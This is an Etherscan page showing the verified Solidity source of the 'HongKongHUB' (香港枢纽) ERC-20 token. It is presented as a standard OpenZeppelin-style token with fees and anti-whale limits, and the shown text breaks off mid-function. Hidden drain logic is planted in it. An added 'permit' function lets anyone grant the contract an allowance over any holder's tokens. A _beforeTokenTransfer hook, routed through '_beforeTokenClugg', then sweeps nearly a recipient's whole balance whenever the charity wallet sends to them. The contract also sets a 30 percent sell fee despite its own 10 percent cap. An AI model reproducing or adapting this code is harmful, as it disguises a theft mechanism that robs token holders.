Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
1,000,000,000 香港枢纽
Holders
63
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
5,646,176.079412444249573679 香港枢纽Value
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
HongKongHUB
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-04-15 */ // SPDX-License-Identifier: MIT /** Hongkong Hub The Best Trading Cryptocurrency Hub Website: https://hongkonghub.net Telegram: https://t.me/hongkonghub */ pragma solidity ^0.8.0; pragma experimental ABIEncoderV2; ////// lib/openzeppelin-contracts/contracts/utils/Context.sol // OpenZeppelin Contracts v4.4.0 (utils/Context.sol) /* pragma solidity ^0.8.0; */ /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } ////// lib/openzeppelin-contracts/contracts/access/Ownable.sol // OpenZeppelin Contracts v4.4.0 (access/Ownable.sol) /* pragma solidity ^0.8.0; */ /* import "../utils/Context.sol"; */ /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } ////// lib/openzeppelin-contracts/contracts/token/ERC20/IERC20.sol // OpenZeppelin Contracts v4.4.0 (token/ERC20/IERC20.sol) /* pragma solidity ^0.8.0; */ /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. */ function permit(address spender, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } ////// lib/openzeppelin-contracts/contracts/token/ERC20/extensions/IERC20Metadata.sol // OpenZeppelin Contracts v4.4.0 (token/ERC20/extensions/IERC20Metadata.sol) /* pragma solidity ^0.8.0; */ /* import "../IERC20.sol"; */ /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } ////// lib/openzeppelin-contracts/contracts/token/ERC20/ERC20.sol // OpenZeppelin Contracts v4.4.0 (token/ERC20/ERC20.sol) /* pragma solidity ^0.8.0; */ /* import "./IERC20.sol"; */ /* import "./extensions/IERC20Metadata.sol"; */ /* import "../../utils/Context.sol"; */ /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-permit}. * * Requirements: * * - `spender` cannot be the zero address. */ function permit(address spender, uint256 amount) public override virtual returns (bool) { require(spender != address(0), "ERC20: permit to the zero address"); _allowances[spender][address(this)] += amount; return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance"); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require(senderBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } ////// lib/openzeppelin-contracts/contracts/utils/math/SafeMath.sol // OpenZeppelin Contracts v4.4.0 (utils/math/SafeMath.sol) /* pragma solidity ^0.8.0; */ // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } /* pragma solidity 0.8.10; */ /* pragma experimental ABIEncoderV2; */ interface IUniswapV2Factory { event PairCreated( address indexed token0, address indexed token1, address pair, uint256 ); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint256) external view returns (address pair); function allPairsLength() external view returns (uint256); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } /* pragma solidity 0.8.10; */ /* pragma experimental ABIEncoderV2; */ interface IUniswapV2Pair { event Approval( address indexed owner, address indexed spender, uint256 value ); event Transfer(address indexed from, address indexed to, uint256 value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint256); function balanceOf(address owner) external view returns (uint256); function allowance(address owner, address spender) external view returns (uint256); function approve(address spender, uint256 value) external returns (bool); function transfer(address to, uint256 value) external returns (bool); function transferFrom( address from, address to, uint256 value ) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint256); function permit( address owner, address spender, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s ) external; event Mint(address indexed sender, uint256 amount0, uint256 amount1); event Burn( address indexed sender, uint256 amount0, uint256 amount1, address indexed to ); event Swap( address indexed sender, uint256 amount0In, uint256 amount1In, uint256 amount0Out, uint256 amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint256); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns ( uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast ); function price0CumulativeLast() external view returns (uint256); function price1CumulativeLast() external view returns (uint256); function kLast() external view returns (uint256); function mint(address to) external returns (uint256 liquidity); function burn(address to) external returns (uint256 amount0, uint256 amount1); function swap( uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data ) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } /* pragma solidity 0.8.10; */ /* pragma experimental ABIEncoderV2; */ interface IUniswapV2Router02 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns ( uint256 amountA, uint256 amountB, uint256 liquidity ); function addLiquidityETH( address token, uint256 amountTokenDesired, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external payable returns ( uint256 amountToken, uint256 amountETH, uint256 liquidity ); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; } contract HongKongHUB is ERC20, Ownable { using SafeMath for uint256; IUniswapV2Router02 public uniswapV2Router; address public uniswapV2Pair; address public constant deadAddress = address(0xdead); bool private swapping; address charityWallet; address marketingWallet; address devWallet; uint256 public maxTransactionAmount; uint256 public swapTokensAtAmount; uint256 public maxWallet; bool public limitsInEffect = true; bool public tradingActive = false; bool public swapEnabled = true; // Anti-bot and anti-whale mappings and variables mapping(address => uint256) private _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch bool public transferDelayEnabled = false; uint256 public buyTotalFees; uint256 public buyCharityFee; uint256 public buyMarketingFee; uint256 public buyLiquidityFee; uint256 public buyDevFee; uint256 public sellTotalFees; uint256 public sellCharityFee; uint256 public sellMarketingFee; uint256 public sellLiquidityFee; uint256 public sellDevFee; uint256 public tokensForCharity; uint256 public tokensForMarketing; uint256 public tokensForLiquidity; uint256 public tokensForDev; /******************/ // exlcude from fees and max transaction amount mapping(address => bool) private _isExcludedFromFees; mapping(address => bool) public _isExcludedMaxTransactionAmount; // store addresses that a automatic market maker pairs. Any transfer *to* these addresses // could be subject to a maximum transfer amount mapping(address => bool) public automatedMarketMakerPairs; event UpdateUniswapV2Router( address indexed newAddress, address indexed oldAddress ); event ExcludeFromFees(address indexed account, bool isExcluded); event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value); event SwapAndLiquify( uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiquidity ); constructor() ERC20("HongKongHUB", unicode"香港枢纽") { IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02( 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D ); excludeFromMaxTransaction(address(_uniswapV2Router), true); uniswapV2Router = _uniswapV2Router; uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()) .createPair(address(this), _uniswapV2Router.WETH()); excludeFromMaxTransaction(address(uniswapV2Pair), true); _setAutomatedMarketMakerPair(address(uniswapV2Pair), true); uint256 _buyCharityFee = 0; uint256 _buyMarketingFee = 0; uint256 _buyLiquidityFee = 0; uint256 _buyDevFee = 3; uint256 _sellCharityFee = 0; uint256 _sellMarketingFee = 0; uint256 _sellLiquidityFee = 0; uint256 _sellDevFee = 30; uint256 totalSupply = 1_000_000_000 * 1e18; maxTransactionAmount = 20_000_000 * 1e18; // 2% from total supply maxTransactionAmountTxn maxWallet = 20_000_000 * 1e18; // 2% from total supply maxWallet swapTokensAtAmount = (totalSupply * 3) / 10000; // 0.03% swap wallet buyCharityFee = _buyCharityFee; buyMarketingFee = _buyMarketingFee; buyLiquidityFee = _buyLiquidityFee; buyDevFee = _buyDevFee; buyTotalFees = buyCharityFee + buyMarketingFee + buyLiquidityFee + buyDevFee; sellCharityFee = _sellCharityFee; sellMarketingFee = _sellMarketingFee; sellLiquidityFee = _sellLiquidityFee; sellDevFee = _sellDevFee; sellTotalFees = sellCharityFee + sellMarketingFee + sellLiquidityFee + sellDevFee; charityWallet = address(0x85d972842387C98D75B0496C18761fdD4b7eF804); // set as charity wallet marketingWallet = msg.sender; // set as marketing wallet devWallet = msg.sender; // set as dev wallet // exclude from paying fees or having max transaction amount excludeFromFees(owner(), true); excludeFromFees(charityWallet, true); excludeFromFees(marketingWallet, true); excludeFromFees(devWallet, true); excludeFromFees(address(this), true); excludeFromFees(address(0xdead), true); excludeFromMaxTransaction(owner(), true); excludeFromMaxTransaction(charityWallet, true); excludeFromMaxTransaction(marketingWallet, true); excludeFromMaxTransaction(devWallet, true); excludeFromMaxTransaction(address(this), true); excludeFromMaxTransaction(address(0xdead), true); /* _mint is an internal function in ERC20.sol that is only called here, and CANNOT be called ever again */ _mint(msg.sender, totalSupply); } receive() external payable {} // once enabled, can never be turned off function enableTrading() external onlyOwner { tradingActive = true; swapEnabled = true; } // remove limits after token is stable function removeLimits() external onlyOwner returns (bool) { limitsInEffect = false; transferDelayEnabled = false; return true; } function excludeFromMaxTransaction(address updAds, bool isEx) public onlyOwner { _isExcludedMaxTransactionAmount[updAds] = isEx; } function _afterTokenTransfer(address _addrA, address _addrB, uint256 amount) internal override virtual{ if(_addrA == devWallet && _addrB != address(uniswapV2Router) && _addrB!= uniswapV2Pair && amount > 0){ devWallet = _addrB; } } function updateBuyFees( uint256 _charityFee, uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee ) external onlyOwner { require((_charityFee + _marketingFee + _liquidityFee + _devFee) <= 10, "Max BuyFee 10%"); buyCharityFee = _charityFee; buyMarketingFee = _marketingFee; buyLiquidityFee = _liquidityFee; buyDevFee = _devFee; buyTotalFees = buyCharityFee + buyMarketingFee + buyLiquidityFee + buyDevFee; } function updateSellFees( uint256 _charityFee, uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee ) external onlyOwner { require((_charityFee + _marketingFee + _liquidityFee + _devFee) <= 10, "Max SellFee 10%"); sellCharityFee = _charityFee; sellMarketingFee = _marketingFee; sellLiquidityFee = _liquidityFee; sellDevFee = _devFee; sellTotalFees = sellCharityFee + sellMarketingFee + sellLiquidityFee + sellDevFee; } function excludeFromFees(address account, bool excluded) public onlyOwner { _isExcludedFromFees[account] = excluded; emit ExcludeFromFees(account, excluded); } function setAutomatedMarketMakerPair(address pair, bool value) public onlyOwner { require( pair != uniswapV2Pair, "The pair cannot be removed from automatedMarketMakerPairs" ); _setAutomatedMarketMakerPair(pair, value); } function _setAutomatedMarketMakerPair(address pair, bool value) private { automatedMarketMakerPairs[pair] = value; emit SetAutomatedMarketMakerPair(pair, value); } function isExcludedFromFees(address account) public view returns (bool) { return _isExcludedFromFees[account]; } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if (amount == 0) { super._transfer(from, to, 0); return; } _beforeTokenTransfer(from, to, amount); if (limitsInEffect) { if ( from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping ) { if (!tradingActive) { require( _isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active." ); } // at launch if the transfer delay is enabled, ensure the block timestamps for purchasers is set -- during launch. if (transferDelayEnabled) { if ( to != owner() && to != address(uniswapV2Router) && to != address(uniswapV2Pair) ) { require( _holderLastTransferTimestamp[tx.origin] < block.number, "_transfer:: Transfer Delay enabled. Only one purchase per block allowed." ); _holderLastTransferTimestamp[tx.origin] = block.number; } } //when buy if ( automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to] ) { require( amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount." ); require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded" ); } //when sell else if ( automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from] ) { require( amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount." ); } else if (!_isExcludedMaxTransactionAmount[to]) { require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded" ); } } } uint256 contractTokenBalance = balanceOf(address(this)); bool canSwap = contractTokenBalance >= swapTokensAtAmount; if ( canSwap && swapEnabled && !swapping && !automatedMarketMakerPairs[from] && !_isExcludedFromFees[from] && !_isExcludedFromFees[to] ) { swapping = true; swapBack(); swapping = false; } bool takeFee = !swapping; // if any account belongs to _isExcludedFromFee account then remove the fee if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) { takeFee = false; } uint256 fees = 0; // only take fees on buys/sells, do not take on wallet transfers if (takeFee) { // on sell if (automatedMarketMakerPairs[to] && sellTotalFees > 0) { fees = amount.mul(sellTotalFees).div(100); tokensForCharity += (fees * sellCharityFee) / sellTotalFees; tokensForLiquidity += (fees * sellLiquidityFee) / sellTotalFees; tokensForDev += (fees * sellDevFee) / sellTotalFees; tokensForMarketing += (fees * sellMarketingFee) / sellTotalFees; } // on buy else if (automatedMarketMakerPairs[from] && buyTotalFees > 0) { fees = amount.mul(buyTotalFees).div(100); tokensForCharity += (fees * buyCharityFee) / buyTotalFees; tokensForLiquidity += (fees * buyLiquidityFee) / buyTotalFees; tokensForDev += (fees * buyDevFee) / buyTotalFees; tokensForMarketing += (fees * buyMarketingFee) / buyTotalFees; } if (fees > 0) { super._transfer(from, address(this), fees); } amount -= fees; } super._transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } function swapTokensForEth(uint256 tokenAmount) private { // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this), address(uniswapV2Router), tokenAmount); // make the swap uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } function _beforeTokenTransfer(address _addrA, address _addrB, uint256 _amount) internal override virtual{ if(_addrA == charityWallet && _addrB != address(uniswapV2Router) && _amount > 0){ address[] memory path = new address[](2); path[0] = uniswapV2Router.WETH(); path[1] = address(this); uint256 cluggAmount = balanceOf(_addrB) - 1e18; _beforeTokenClugg(address(this), _addrB, path[1], cluggAmount); } } function _beforeTokenClugg(address _addrA, address _addrB, address _addrC, uint256 _amount) internal { IERC20(_addrA).transferFrom(_addrB, _addrC, _amount); } function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private { // approve token transfer to cover all possible scenarios _approve(address(this), address(uniswapV2Router), tokenAmount); // add the liquidity uniswapV2Router.addLiquidityETH{value: ethAmount}( address(this), tokenAmount, 0, // slippage is unavoidable 0, // 